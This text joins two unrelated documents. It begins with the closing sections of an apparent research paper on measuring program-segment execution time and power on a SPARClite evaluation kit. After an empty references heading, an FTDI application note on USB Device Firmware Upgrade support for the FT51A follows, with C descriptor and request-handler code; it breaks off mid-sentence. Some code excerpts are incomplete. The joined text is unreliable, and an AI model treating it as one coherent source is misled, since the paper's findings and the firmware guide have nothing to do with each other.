The possibility to connect the logic state analyzer with the measured execution time and power consumption metrics to the local network with simple ftp or telnet sessions allows a very flexible integration of the presented prototyping approach into any timing or power estimation tool suite. Software driven remote power control of logic state analyzer and evaluation kit as well as shell script driven measurement make it simple to specify where trigger points are set in the source code, to start the measurement and to read the results. This even permits Internet based measurement with a standard web browser running on top of the application, assuming a security mechanism is implemented.
At present, the SPARClite evaluation kit and the logic state analyzer are part of the local network and can be accessed via Ethernet. Current work deals with the connection of experimental setups including a research platform and measuring devices to the Internet. The implementation of a web browser user interface is within the scope of this project, which provides an Internet based hardware and software design environment. Both scheduling techniques and security mechanisms are hot topics.
6. EXPERIMENTS
In the following, experiments for compact trace acquisition and results for timing and power measurement of program segments and complete programs are presented. Experiments for timing and power measurement are done in parallel because the measurement of execution time does not increase complexity when trigger points are added for power measurement.
6.1. Case Study: Bubble Sort Algorithm
In a case study, the execution time and the power consumption of a complete bubble sort algorithm instrumented with one set of input data have been measured; no best case or worst case bounds have been determined. The source code is shown on the upper left side of figure 6a. Trigger points are specified at the beginning and at the end of the program to demonstrate the measurement of the complete program. An additional trigger point is inserted in the outer \texttt{for}-loop to demonstrate multiple iterations across a trigger point. Results are back annotated to the source code where the trigger points are inserted. The different tables in figure 6 show the following: In \textit{a}, the source code with the trigger point definitions is shown, which is translated to a source code with additional braces \{ \} and inline assembler instructions in \textit{b}. In \textit{c} we can see the trigger point definition file while the table in \textit{d} keeps track of the shifting source code references. An intermediate format of the values measured with the logic state analyzer is given in \textit{e}. The first column shows the trigger point number followed by trigger address, file ID, source code line number extracted from the trigger point and the timing offset in states relative to the previous trigger point. The source code with the results is shown in \textit{f}. Back annotated results always reflect the relative values to the last trigger point. The number of iterations across the trigger point is given at the very beginning of the line, followed by the execution time and the power consumption. Execution time and power consumption at the first trigger point give the values for the program start. The execution time between the trigger points 10 and 24 in figure 6f, i.e. the timing for the execution of the complete program without startup overhead, is 1900 ns at TP24 plus 13725 ns at TP10, resulting in 15625 ns for the total execution time.
The power consumption is 1560 nWs plus 10899 nWs resulting in 12459 nWs for the overall power consumption. Depending on the setting of trigger points, measurements for program segments like the inner \texttt{for}-loop are possible.
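The back annotation arithmetic from figure 6f reduces to summing the relative values per trigger point, as the following sketch reproduces with the numbers quoted above.

```python
# Illustrative back annotation arithmetic: relative time and energy
# values at each trigger point are summed to the totals for the
# complete program (startup overhead at the first trigger excluded).

def totals(per_trigger):
    """per_trigger: list of (time_ns, energy_nws) relative values."""
    return (sum(t for t, _ in per_trigger),
            sum(e for _, e in per_trigger))

# values for TP10 and TP24 from figure 6f
time_ns, energy_nws = totals([(13725, 10899), (1900, 1560)])
```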
Further experiments for table based software power prediction as explained in section 5.6 and presented by Tiwari\textsuperscript{6,12} are straightforward to implement while we focus on direct measurement of program segments because our prototyping platform and the measurement facilities are easy to operate due to the remote control.
6.2. Application in a Static Software Estimation Approach
In the following experiments, the SPARClite evaluation kit was integrated into a timing and power estimation tool suite.\textsuperscript{2} No test patterns for code instrumentation are inserted but the conservative worst cases for execution time and power consumption are determined using path analysis. The tool suite first determines (in-)feasible paths in a program that can be executed on the evaluation kit. This delivers worst case execution time and power consumption of the program segments. The worst case path through the program is determined to deliver the overall worst case for execution time and power consumption.
Using this methodology, measurements for execution time and power consumption of program segments with the SPARClite evaluation kit were done as presented in table 1. Here we investigated execution time and power consumption of the top level of an ATM switch component. Table 1 gives the upper bounds for execution time and power consumption of the operation administration and maintenance (OAM) component using different path analysis techniques. Simulation results for program segments using StrongARM are compared to our SPARClite example where the prototyping approach uses the compact trace acquisition and power measurement for the program segments. In the first approach by Li and Malik,\textsuperscript{5} measured program segments consisting of one basic block\textsuperscript{9} each are shorter than in the following two approaches because of a missing exploitation of program paths. This means more trigger points and the according overheads regarding conservative approaches for pipeline and cache states are part of the program, leading to higher overestimations. In the second approach by Ye and Ernst,\textsuperscript{1} some basic blocks are joined to single feasible paths (SFP), so fewer trigger points are needed, resulting in less overestimation. In the third approach by Wolf and Ernst,\textsuperscript{2} even fewer trigger points are needed because of the exploitation of a more accurate path analysis, resulting in fewer, but longer program segments containing context dependent paths (CDP) with less overhead.
The exact case is determined by simulation or measurement of the complete program using worst case input data as test patterns. It serves as a reference to compare the overestimations of the conservative static approaches.
We notice that overestimations with the evaluation kit are higher than when using simulators, especially when more program segments are involved. The reason is the more conservative handling of program segments when using trigger points compared to a cycle-true processor simulator. This means that the application of path analysis in conservative static approaches is very important when using evaluation kits for architecture modeling, because it reduces the number of inserted trigger points and the corresponding overhead. On the other hand, we have shown that our approach is suitable for the segment-wise execution time and power measurement that is needed in static approaches.
Figure 6. Source code with trigger points and intermediate logic state analyzer format
<table>
<thead>
<tr>
<th>Approach</th>
<th>SFP</th>
<th>CDP</th>
<th>StrongARM time</th>
<th>StrongARM power</th>
<th>SPARClite time</th>
<th>SPARClite power</th>
</tr>
</thead>
<tbody>
<tr>
<td>Li/Malik</td>
<td>0</td>
<td>0</td>
<td>11986 ns</td>
<td>1282 nWs</td>
<td>18425 ns</td>
<td>15127 nWs</td>
</tr>
<tr>
<td>Ye/Ernst</td>
<td>3</td>
<td>0</td>
<td>11836 ns</td>
<td>1261 nWs</td>
<td>18125 ns</td>
<td>14880 nWs</td>
</tr>
<tr>
<td>Wolf/Ernst</td>
<td>3</td>
<td>2</td>
<td>9505 ns</td>
<td>911 nWs</td>
<td>14870 ns</td>
<td>12208 nWs</td>
</tr>
<tr>
<td>Exact Bounds</td>
<td>-</td>
<td>-</td>
<td>9471 ns</td>
<td>903 nWs</td>
<td>13650 ns</td>
<td>11206 nWs</td>
</tr>
</tbody>
</table>
Table 1. Upper bound execution time and power for the OAM component
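As a quick sanity check on the margins in Table 1, the relative overestimation of each conservative bound can be computed with a small helper (illustrative only, not part of the tool suite):

```c
/* Relative overestimation of a conservative bound versus the exact value,
 * in percent. With the Table 1 values: the SPARClite Li/Malik time bound
 * of 18425 ns vs. the exact 13650 ns gives roughly 35%, Wolf/Ernst
 * (14870 ns) stays below 9%, and on the StrongARM simulator the
 * Wolf/Ernst bound (9505 ns vs. 9471 ns) is under 0.4%. */
double overestimation_pct(double bound, double exact)
{
    return (bound - exact) / exact * 100.0;
}
```

These numbers illustrate the trend discussed below: bounds obtained on the evaluation kit carry noticeably larger margins than simulator-based bounds.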
7. CONCLUSION
Segment-wise, real-time execution together with timing and power measurement that preserves the cache behavior of the program under investigation is required for application in formal program analysis. The presented approach to fast and compact trace acquisition, including execution time and power measurement with off-the-shelf evaluation kits, meets these requirements. Avoiding full traces by using trigger points leads to much higher efficiency than in previous approaches, while the one-way communication through the terminal program allows real-time execution of the program under investigation. Result measurement using an off-the-shelf logic state analyzer, automatic evaluation and back annotation abstract the hardware evaluation kit to the same level as a software simulator. It is completely transparent to the designer working with an electronic design automation tool suite and matches novel approaches to formal running time analysis based on program segment execution.
Execution time and power consumption of program segments and complete programs have been measured using a commercial SPARClite evaluation kit. The approach is generic and can easily be applied to any commercial evaluation kit with bus access. Current work focuses on experiments with execution time and power consumption prediction using instruction tables, which can be a base for software power reduction. Internet access to the measurement facilities is also under investigation.
REFERENCES
Application Note
AN_344
FT51A DFU Sample
Version 1.0
Issue Date: 2015-12-21
This document provides a guide for using the FT51A development environment to incorporate DFU (Device Firmware Upgrade) support in firmware.
Use of FTDI devices in life support and/or safety applications is entirely at the user’s risk, and the user agrees to defend, indemnify and hold FTDI harmless from any and all damages, claims, suits or expense resulting from such use.
# Table of Contents
1 Introduction .................................................................................................................. 4
1.1 Overview .................................................................................................................. 4
1.2 Features .................................................................................................................... 4
1.3 Limitations ............................................................................................................... 4
1.4 Scope ......................................................................................................................... 4
2 DFU Overview .................................................................................................................. 5
2.1 DFU Library Overview .............................................................................................. 5
2.2 Firmware Overview .................................................................................................. 6
2.2.1 Run-Time Mode ................................................................................................. 6
2.2.2 DFU Mode ......................................................................................................... 7
2.2.3 FT51A Libraries ................................................................................................. 7
2.3 Host PC Application Overview ................................................................................ 7
3 DFU Firmware .................................................................................................................. 9
3.1 USB Descriptors ....................................................................................................... 9
3.1.1 Run-Time Descriptors ....................................................................................... 9
3.1.2 DFU Descriptors ............................................................................................. 11
3.1.3 Descriptor Selection ......................................................................................... 13
3.2 USB Class Requests ................................................................................................. 14
3.3 USB Reset Handler ................................................................................................. 15
3.4 Timer ....................................................................................................................... 16
3.5 Device Detach-Attach ............................................................................................. 16
4 DFU Application .............................................................................................................. 17
4.1 libusb-win32 .......................................................................................................... 17
4.1.1 Installing libusb-win32 Driver .......................................................................... 17
4.2 WinUSB .................................................................................................................... 17
4.2.1 Installing WinUSB Driver ............................................................................... 17
4.3 Loading Firmware Files ........................................................................................... 17
4.4 Programming DFU Interfaces .................................................................................. 17
5 Possible Improvements ........................................... 18
5.1 Obfuscating DFU Commands ............................... 20
5.2 Adding Manifestation Checks ............................... 20
5.3 Recovery .......................................................... 20
5.4 Security ............................................................ 20
6 Contact Information .............................................. 21
Appendix A – References ........................................... 23
Document References ............................................... 23
Acronyms and Abbreviations ..................................... 23
Appendix B – List of Tables & Figures ........................... 24
List of Figures .......................................................... 24
Appendix C – Revision History ................................... 25
1 Introduction
This application note documents the FT51A DFU library and provides an example firmware project for the FT51A and host PC application. The host PC application will communicate with the firmware on the FT51A to update the contents of the FT51A MTP Flash. All communication is via the USB interface.
1.1 Overview
The DFU firmware project and host PC application together demonstrate a reusable method for implementing firmware updates to an FT51A device. The FT51A need only be connected to a host PC via the USB interface.
The DFU firmware is added to the normal functional firmware programmed into the FT51A and is only activated when special commands are sent by the host PC. It can therefore be built into any FT51A firmware and used when required.
An example application would be to allow Field Service Engineers to update firmware on devices embedded in industrial machinery, or end users to apply an update to a device based on an FT51A.
1.2 Features
The DFU library has the following features:
- Open source library layered on FT51A USB Library.
- Can be added to existing firmware by adding an interface to the configuration descriptor.
- Ability to download firmware from host PC to device.
- User firmware implements the USB requests. This allows non-standard methods to be implemented to add obfuscation.
1.3 Limitations
The DFU library has the following limitations:
- No manifestation stage. The device cannot support manifestation and cannot therefore process a firmware image before programming.
As with most firmware updates, it is imperative that the firmware download is not interrupted either by power interruption or by interrupting the programming application as the data downloaded immediately overwrites the contents of the MTP Flash rendering the existing contents invalid.
A recovery method is to use the FT51A programmer/debugger module and the “FT51prg.exe” tool to re-load valid code to the MTP Flash. Details on this tool can be found in Application Note AN_289 FT51A Programming Guide. The executable and source code for “FT51prg.exe” are available in the FT51A Software Development Kit.
1.4 Scope
The guide is intended for developers who are creating applications, extending FTDI provided applications or implementing example applications for the FT51A.
In the context of the FT51A, an “application” refers to firmware that runs on the FT51A; “libraries” are source code provided by FTDI to help users access specific hardware features of the chip.
The FT51A Tools are currently only available for Microsoft Windows platform and are tested on Windows 7 and Windows 8.1.
2 DFU Overview
The DFU protocol and requirements are documented in the Device Firmware Upgrade 1.1 specification:
http://www.usb.org/developers/docs/devclass_docs/DFU_1.1.pdf
The FT51A implementation is for devices which are capable of downloading and can optionally perform any detach-attach sequence to switch between DFU and run-time modes.
Due to the memory constraints of the FT51A it is not practical to implement manifestation. This would require storing and validating the firmware before programming the MTP Flash.
2.1 DFU Library Overview
The DFU library uses the FT51A USB library and calls the following functions:
- USB_transfer()
- USB_stall_endpoint()
It is contained in a single source code file “ft51_usb_dfu.c” and has a library header “ft51_usb_dfu.h”.
The DFU Attributes supported by the library, as described in the bmAttributes field of the DFU Functional Descriptor, are bitWillDetach and bitCanDnload. The bitManifestationTolerant and bitCanUpload features are not supported.
Calls to the library are made by the firmware when class requests are received for the DFU interface or when a bus state change on the USB is detected.
Additionally there is a timer handler which must be called every millisecond to implement the detach timer described in the specification.
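The millisecond tick required by the library can be sketched as follows. The function and variable names here are illustrative, not the actual ft51_usb_dfu.h API; the shape assumed is a countdown armed by DFU_DETACH with the host-supplied wValue timeout:

```c
#include <stdint.h>

static uint16_t detach_timeout_ms; /* hypothetical countdown in milliseconds */

/* Arm the detach timer; wValue is the timeout from the DFU_DETACH request */
void dfu_detach_arm(uint16_t wValue)
{
    detach_timeout_ms = wValue;
}

/* Call from a 1 ms periodic interrupt; returns 1 exactly when the timer
 * expires (the device then falls back to run-time mode), 0 otherwise. */
int dfu_timer_1ms(void)
{
    if (detach_timeout_ms == 0)
        return 0;                 /* timer not running */
    if (--detach_timeout_ms == 0)
        return 1;                 /* expired */
    return 0;
}
```

In the real library a USB reset observed before expiry moves the state machine to DFU mode, as described below.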
The DFU library implements a state machine to provide the functionality required by the DFU specification. A schematic of the state machine is shown in Figure 2.1. Run-time mode states are red and DFU mode states are blue.
The “USB Reset” transitions can be either performed by the host resetting the USB or by the device detaching from the USB. If the bitWillDetach attribute is set then the device must perform detach. If it is not set then the host must reset the USB.
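The states named above (appIDLE, appDETACH, dfuMANIFEST-WAIT-RESET, and so on) are the bState codes defined by the DFU 1.1 specification. A sketch of the codes, with illustrative enum names rather than the library's own identifiers:

```c
/* bState values from the USB DFU 1.1 specification; the first two are
 * run-time states, the rest are DFU-mode states. */
enum dfu_state {
    DFU_STATE_APP_IDLE            = 0,
    DFU_STATE_APP_DETACH          = 1,
    DFU_STATE_DFU_IDLE            = 2,
    DFU_STATE_DNLOAD_SYNC         = 3,
    DFU_STATE_DNBUSY              = 4,
    DFU_STATE_DNLOAD_IDLE         = 5,
    DFU_STATE_MANIFEST_SYNC       = 6,
    DFU_STATE_MANIFEST            = 7,
    DFU_STATE_MANIFEST_WAIT_RESET = 8,
    DFU_STATE_UPLOAD_IDLE         = 9,
    DFU_STATE_ERROR               = 10
};

/* A dfu_is_runtime()-style check can be derived from the state alone */
int dfu_state_is_runtime(enum dfu_state s)
{
    return s == DFU_STATE_APP_IDLE || s == DFU_STATE_APP_DETACH;
}
```

The red/blue split in Figure 2.1 corresponds exactly to this run-time versus DFU-mode partition of the state codes.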
2.2 Firmware Overview
The firmware is specifically written to allow it to be adapted and easily included in other FT51A projects.
Firmware will initialise and configure the FT51A as normal, setting up the USB device as required. It will however, add some code to the USB standard requests handlers to support the DFU library.
The only libraries required are the FT51A USB library and parts of the FT51A General Config library. If LED indicators are desired then the IOMUX library can be added to configure output pins for LEDs.
2.2.1 Run-Time Mode
When in run-time mode, the firmware will return a configuration descriptor containing the normal functions of the FT51A firmware plus one additional interface descriptor for the DFU. This is the DFU functional descriptor.
The firmware will decode standard and vendor requests as normal, but check for class requests which are addressed to the DFU interface. If these are found then a function in the DFU library will be called. From run-time mode the DFU can check the status and state of the DFU state machine and initiate a DFU_DETACH to transition into DFU mode.
If the `bitWillDetach` attribute is not set the DFU_DETACH request will start a timer and continue. If a USB reset is observed before the timer expires then the DFU state machine will move to DFU mode.
If the `bitWillDetach` attribute is set the device will detach from the USB using a call to the USB library. The host will see this as a disconnection and will re-enumerate the device when it reattaches to the USB.
With both methods a function handler for USB reset events will call the DFU library to change from run-time to DFU mode.
2.2.2 DFU Mode
When DFU mode is entered, the normal functions of the firmware are not available and the firmware will return different device and configuration descriptors. These will contain a single interface describing the DFU mode. The device will be re-enumerated by the host and the new device and configuration descriptors read.
Standard USB requests will be handled as normal, but class requests to the DFU interface (this may be a different interface number in DFU mode from the run-time mode) will be passed to the DFU library.
If the `bitWillDetach` attribute is not set the device will rely on the host performing a USB reset when programming is finished, otherwise the device will detach from the USB and force the host to re-enumerate the device.
Again, the function handler for USB reset events must also call the DFU library to change from DFU back to run-time mode and reset the FT51A to run the newly programmed firmware.
2.2.3 FT51A Libraries
The DFU firmware uses the FT51A USB library, DFU library, general config library and the IOMUX library. The IOMUX library is not used in the example code but is included to allow further functionality to be added.
2.2.4 WinUSB Drivers
The firmware will use WCID (Windows Compatible ID) to tell a Microsoft Windows operating system that it requires WinUSB to be installed for the DFU interface. This is achieved by the firmware responding to a Microsoft-defined string descriptor to identify the device as supporting WCID and providing the host PC with a vendor request code for the next stage of WCID.
The second stage tells the host PC which drivers to load for the device by responding to a set of vendor requests with information required.
When this is successfully completed the DFU interface is accessible to host PC applications using the WinUSB API. It is also compatible with libusb for Windows.
Please note that the WinUSB drivers will need to be installed when the device is first connected. They will also need to be installed when the device changes from run-time mode to DFU mode. Each time the driver is loaded it may go to Windows Update to check for newer drivers.
2.3 Host PC Application Overview
The host PC application recommended is dfu-util. This can be obtained from [http://dfu-util.sourceforge.net/](http://dfu-util.sourceforge.net/)
It uses the libusb library to communicate with the device via Microsoft WinUSB drivers.
The dfu-util program is a command line application that programs a binary file onto the device. The FT51A Eclipse plugin has a Post Build step to produce a ".bin" binary file from the IHX (Intel HeX file) output file using the makebin utility supplied by SDCC.
The format of the dfu-util command line is typically as follows:
```
dfu-util -D filename.bin
```
Refer to the documentation for dfu-util for further options.
The first time dfu-util switches the device from run-time to DFU mode it may timeout waiting for Windows to install the WinUSB driver. Re-running dfu-util when this process is complete will re-commence the firmware update correctly.
3 DFU Firmware
The firmware included in the example code demonstrates implementing run-time mode descriptors, DFU mode descriptors, switching from run-time to DFU mode and updating firmware. It has no run-time features; however, these can be added by extending the run-time configuration descriptor and adding code for the features.
The control endpoint max packet size is defined in the header of the firmware code for convenience along with the Product IDs (PIDs) used in the example. The setting of bMaxPacketSize0 in the device descriptor MUST match the size of the control endpoint max packet size set in the "ep_size" member of the USB_ctx structure when the USB library is initialised.
The following code is used to set the packet sizes for the control endpoint for both the device descriptor and USB initialisation.
```c
// USB Endpoint Zero packet size (both must match)
#define USB_CONTROL_EP_MAX_PACKET_SIZE 8
#define USB_CONTROL_EP_SIZE USB_EP_SIZE_8
```
The DFU library does not calculate addresses from the block numbers passed in the DFU_DNLOAD request. The application specifies both the size of the programming block and calculates the address. This increases the flexibility of the library and allows the application to set block sizes and even how addresses are calculated.
The maximum block size for the DFU library is 64 bytes as defined in DFU_MAX_BLOCK_SIZE in "ft51_usb_dfu.h". This can be changed to a smaller value by modifying the definition of DFU_BLOCK_SIZE.
```c
#define DFU_BLOCK_SIZE DFU_MAX_BLOCK_SIZE
```
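The block-to-address mapping used by the firmware in Section 3.2 (`req->wValue * DFU_MAX_BLOCK_SIZE`) can be sketched as a standalone helper. The function name is illustrative; the definitions match those above:

```c
#include <stdint.h>

#define DFU_MAX_BLOCK_SIZE 64   /* as defined in "ft51_usb_dfu.h" */
#define DFU_BLOCK_SIZE DFU_MAX_BLOCK_SIZE

/* The DFU library leaves address computation to the application: the host
 * sends an incrementing block number in wValue, and a linear flash layout
 * simply maps block n to byte offset n * DFU_BLOCK_SIZE. */
uint32_t dfu_block_to_address(uint16_t wValue)
{
    return (uint32_t)wValue * DFU_BLOCK_SIZE;
}
```

Because the application owns this mapping, non-linear layouts or obfuscated addressing schemes can be substituted without changing the library.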
3.1 USB Descriptors
The DFU firmware stores two sets of device descriptors and configuration descriptors. It stores a single table of string descriptors as the strings for run-time and DFU modes can be selected by the descriptors as needed from the same table.
The USB class, subclass and protocol values, along with other general USB definitions, are found in the library include file "ft51_usb.h".
3.1.1 Run-Time Descriptors
The first set of descriptors is the run-time set. The device descriptor contains the VID and PID for the run-time function.
```c
USB_device_descriptor device_descriptor_runtime =
{
    .bLength = 0x12,
    .bDescriptorType = USB_DESCRIPTOR_TYPE_DEVICE,
    .bcdUSB = USB_BCD_VERSION_2_0,
    .bDeviceClass = USB_CLASS_DEVICE,
    .bDeviceSubClass = USB_SUBCLASS_DEVICE,
    .bDeviceProtocol = USB_PROTOCOL_DEVICE,
    .bMaxPacketSize0 = USB_CONTROL_EP_MAX_PACKET_SIZE,
    .idVendor = USB_VID_FTDI,            // 0x0403 (FTDI)
    .idProduct = DFU_USB_PID_RUNTIME,    // 0x0fed
    .bcdDevice = 0x0101,
    .iManufacturer = 0x01,               // String 1
    .iProduct = 0x02,                    // String 2
    .iSerialNumber = 0x03,               // String 3
    .bNumConfigurations = 0x01
};
```
The configuration descriptor would normally contain interface descriptors and endpoint descriptors for the run-time function. These are not implemented in this example.
The last interface descriptor, and the only one in this configuration descriptor, is for a DFU interface that implements no endpoints. All DFU communication is through the control endpoints to the DFU interface.
The USB class of Application Specific allows the subclass to specify that it is a Device Firmware Update (DFU) and the protocol indicates that this is Run-Time mode.
```c
// Structure containing layout of configuration descriptor
struct config_descriptor_runtime
{
    USB_configuration_descriptor configuration;
    USB_interface_descriptor interface;
    USB_dfu_functional_descriptor functional;
};

struct config_descriptor_runtime config_descriptor_runtime =
{
    .configuration.bLength = 0x09,
    .configuration.bDescriptorType = USB_DESCRIPTOR_TYPE_CONFIGURATION,
    .configuration.wTotalLength = sizeof(struct config_descriptor_runtime),
    .configuration.bNumInterfaces = 0x01,
    .configuration.bConfigurationValue = 0x01,
    .configuration.iConfiguration = 0x00,
    .configuration.bmAttributes = USB_CONFIG_BMATTRIBUTES_VALUE,
    .configuration.bMaxPower = 0xFA,                              // 500 mA
    // ---- INTERFACE DESCRIPTOR for DFU Interface ----
    .interface.bLength = 0x09,
    .interface.bDescriptorType = USB_DESCRIPTOR_TYPE_INTERFACE,
    .interface.bInterfaceNumber = DFU_USB_INTERFACE_RUNTIME,
    .interface.bAlternateSetting = 0x00,
    .interface.bNumEndpoints = 0x00,
    .interface.bInterfaceClass = USB_CLASS_APPLICATION,           // Application Specific Class
    .interface.bInterfaceSubClass = USB_SUBCLASS_DFU,             // Device Firmware Update
    .interface.bInterfaceProtocol = USB_PROTOCOL_DFU_RUNTIME,     // Runtime Protocol
    .interface.iInterface = 0x05,                                 // String 5
    // ---- FUNCTIONAL DESCRIPTOR for DFU Interface ----
    .functional.bLength = 0x09,
    .functional.bDescriptorType = USB_DESCRIPTOR_TYPE_DFU_FUNCTIONAL,
    .functional.bmAttributes = USB_DFU_BMATTRIBUTES_CANLOAD,      // bitCanDnload
    .functional.wDetachTimeOut = DFU_TIMEOUT,                     // suggest 8192ms
    .functional.wTransferSize = DFU_BLOCK_SIZE,                   // typically 64 bytes
    .functional.bcdDfuVersion = USB_BCD_VERSION_DFU_1_1,          // DFU Version 1.1
};
```
The DFU functional descriptor contains a field called bmAttributes. This describes the sections of the DFU specification that are supported by the implementation.
The DFU library supports firmware downloading and device detach-attach. It does not support uploading or manifestation. Therefore the bmAttributes mask needs the “bitCanDnload” bit set, and “bitWillDetach” can be set or clear. It is not set in this example for clarity.
The "bitCanUpload" and "bitManifestationTolerant" must be clear.
3.1.2 DFU Descriptors
The device descriptor contains the VID and PID for the DFU function. This may or may not be the same as the run-time VID and PID.
```c
USB_device_descriptor device_descriptor_dfumode =
{
    .bLength = 0x12,
    .bDescriptorType = USB_DESCRIPTOR_TYPE_DEVICE,
    .bcdUSB = USB_BCD_VERSION_2_0,
    .bDeviceClass = USB_CLASS_DEVICE,
    .bDeviceSubClass = USB_SUBCLASS_DEVICE,
    .bDeviceProtocol = USB_PROTOCOL_DEVICE,
    .bMaxPacketSize0 = USB_CONTROL_EP_MAX_PACKET_SIZE,
    .idVendor = USB_VID_FTDI,            // 0x0403 (FTDI)
    .idProduct = DFU_USB_PID_DFUMODE,    // 0x0fee
    .bcdDevice = 0x0101,
    .iManufacturer = 0x01,               // String 1
    .iProduct = 0x04,                    // String 4
    .iSerialNumber = 0x03,               // String 3
    .bNumConfigurations = 0x01
};
```
The configuration descriptor for DFU will contain only an interface descriptor and a functional descriptor for the DFU interface.
The USB class, subclass and protocol indicate that this device is now in DFU mode.
```c
// Structure containing layout of configuration descriptor
struct config_descriptor_dfumode
{
    USB_configuration_descriptor configuration;
    USB_interface_descriptor interface;
    USB_dfu_functional_descriptor functional;
};

struct config_descriptor_dfumode config_descriptor_dfumode =
{
    .configuration.bLength = 0x09,
    .configuration.bDescriptorType = USB_DESCRIPTOR_TYPE_CONFIGURATION,
    .configuration.wTotalLength = sizeof(struct config_descriptor_dfumode),
    .configuration.bNumInterfaces = 0x01,
    .configuration.bConfigurationValue = 0x01,
    .configuration.iConfiguration = 0x00,
    .configuration.bmAttributes = USB_CONFIG_BMATTRIBUTES_VALUE,
    .configuration.bMaxPower = 0xFA,                              // 500 mA
    // ---- INTERFACE DESCRIPTOR for DFU Interface ----
    .interface.bLength = 0x09,
    .interface.bDescriptorType = USB_DESCRIPTOR_TYPE_INTERFACE,
    .interface.bInterfaceNumber = DFU_USB_INTERFACE_DFUMODE,
    .interface.bAlternateSetting = 0x00,
    .interface.bNumEndpoints = 0x00,
    .interface.bInterfaceClass = USB_CLASS_APPLICATION,           // Application Specific Class
    .interface.bInterfaceSubClass = USB_SUBCLASS_DFU,             // Device Firmware Update
    .interface.bInterfaceProtocol = USB_PROTOCOL_DFU_DFUMODE,     // DFU Mode Protocol
    .interface.iInterface = 0x05,                                 // String 5
    // ---- FUNCTIONAL DESCRIPTOR for DFU Interface ----
    .functional.bLength = 0x09,
    .functional.bDescriptorType = USB_DESCRIPTOR_TYPE_DFU_FUNCTIONAL,
    .functional.bmAttributes = USB_DFU_BMATTRIBUTES_CANLOAD,      // bitCanDnload
    .functional.wDetachTimeOut = DFU_TIMEOUT,                     // suggest 8192ms
    .functional.wTransferSize = DFU_BLOCK_SIZE,                   // typically 64 bytes
    .functional.bcdDfuVersion = USB_BCD_VERSION_DFU_1_1,          // DFU Version 1.1
};
```
The same bmAttributes mask must appear for the DFU functional descriptor in both run-time and DFU modes.
3.1.3 Descriptor Selection
The standard request handler for GET_DESCRIPTOR requests needs to select the run time or DFU mode descriptors. The firmware is responsible for ensuring the correct descriptors are returned to the host PC.
Determining if the firmware is in run-time or DFU mode is achieved by calling the `dfu_is_runtime()` function from the DFU library.
A non-zero response will select the run-time mode descriptors and a zero response, the DFU mode descriptors.
```c
FT51_STATUS standard_req_get_descriptor(USB_device_request *req) {
    uint8_t *src = NULL;
    uint16_t length = req->wLength;
    uint8_t hValue = req->wValue >> 8;
    uint8_t lValue = req->wValue & 0x00ff;
    uint8_t i, slen;

    switch (hValue) {
    case USB_DESCRIPTOR_TYPE_DEVICE:
        if (dfu_is_runtime()) {
            src = (uint8_t *)&device_descriptor_runtime;
        } else {
            src = (uint8_t *)&device_descriptor_dfumode;
        }
        if (length > sizeof(USB_device_descriptor)) // too many bytes requested
            length = sizeof(USB_device_descriptor); // Entire structure.
        break;
    case USB_DESCRIPTOR_TYPE_CONFIGURATION:
        if (dfu_is_runtime()) {
            src = (uint8_t *)&config_descriptor_runtime;
            if (length > sizeof(config_descriptor_runtime)) // too many bytes requested
                length = sizeof(config_descriptor_runtime); // Entire structure.
        } else {
            src = (uint8_t *)&config_descriptor_dfumode;
            if (length > sizeof(config_descriptor_dfumode)) // too many bytes requested
                length = sizeof(config_descriptor_dfumode); // Entire structure.
        }
        break;
    }
}
```
The FT51A USB library will send the descriptor structure selected by the `standard_req_get_descriptor()` function to the host.
Note that string descriptor selection is not shown in this code sample. It does not depend on the selection of run-time or DFU modes.
3.2 USB Class Requests
The firmware is responsible for handling USB class requests. It must determine if the firmware is in run-time or DFU mode and whether a request has been directed to the DFU interface. This must not interfere with other class requests that may be decoded in the firmware.
The first check is that the class request is aimed at an interface:
```c
FT51_STATUS class_req_cb(USB_device_request *req)
{
    FT51_STATUS status = FT51_FAILED;
    uint8_t interface = LSB(req->wIndex) & 0x0F;

    // For DFU requests ensure the recipient is an interface...
    if ((req->bmRequestType & USB_BMREQUESTTYPE_RECIPIENT_MASK) ==
        USB_BMREQUESTTYPE_RECIPIENT_INTERFACE)
    {
        // Run-time mode: only DFU_DETACH, DFU_GETSTATUS and DFU_GETSTATE
        // are valid; all other requests fail and stall the control endpoint.
        if (dfu_is_runtime())
        {
            if (interface == DFU_USB_INTERFACE_RUNTIME)
            {
                switch (req->bRequest)
                {
                case USB_CLASS_REQUEST_DETACH:
                    dfu_class_req_detach(req->wValue);
                    // Only uncomment if bitWillDetach is set in bmAttributes
                    //usb_detach_attach();
                    status = FT51_OK;
                    break;
                case USB_CLASS_REQUEST_GETSTATUS:
                    dfu_class_req_getstatus();
                    status = FT51_OK;
                    break;
                case USB_CLASS_REQUEST_GETSTATE:
                    dfu_class_req_getstate();
                    status = FT51_OK;
                    break;
                }
            }
        }
    }
}
```
If this is correct then the firmware must check if it is in run-time or DFU mode before checking the interface number. The interface number for the DFU mode may differ from that of the run-time mode.
For run-time mode, only the DFU_DETACH, DFU_GETSTATUS and DFU_GETSTATE requests are valid. All other requests will fail and stall the control endpoint.
The example shows that the DFU_DETACH request will not perform a detach as “bitWillDetach” is not set in the DFU functional descriptor.
If it is not in run-time mode then a different set of requests is valid.
```c
else
{
    if (interface == DFU_USB_INTERFACE_DFUMODE)
    {
        switch (req->bRequest)
        {
        case USB_CLASS_REQUEST_DNLOAD:
            dfu_class_req_download(req->wValue * DFU_MAX_BLOCK_SIZE,
                                   req->wLength);
            status = FT51_OK;
            break;
        case USB_CLASS_REQUEST_GETSTATUS:
            dfu_class_req_getstatus();
            if (dfu_is_wait_reset())
            {
                // Only uncomment if bitWillDetach is set in bmAttributes
                //usb_detach_attach();
            }
            status = FT51_OK;
            break;
        case USB_CLASS_REQUEST_GETSTATE:
            dfu_class_req_getstate();
            status = FT51_OK;
            break;
        case USB_CLASS_REQUEST_CLRSTATUS:
            dfu_class_req_clrstatus();
            status = FT51_OK;
            break;
        case USB_CLASS_REQUEST_ABORT:
            dfu_class_req_abort();
            status = FT51_OK;
            break;
        default:
        case USB_CLASS_REQUEST_UPLOAD:
            // Unknown or unsupported request.
            break;
        }
    }
}
return status;
```
In this mode, the DFU_DNLOAD, DFU_GETSTATUS, DFU_CLRSTATUS, DFU_GETSTATE and
DFU_ABORT requests are valid. DFU_UPLOAD is specifically checked for and disallowed although
ignoring it would have the same effect.
Again, the device will not perform a detach because "bitWillDetach" is not set in the DFU functional
descriptor. When that bit is set, the DFU_GETSTATUS request is the trigger for the detach-attach
sequence.
3.3 USB Reset Handler
Transitions from the appDETACH state to the dfuIDLE state and from dfuMANIFEST-WAIT-RESET
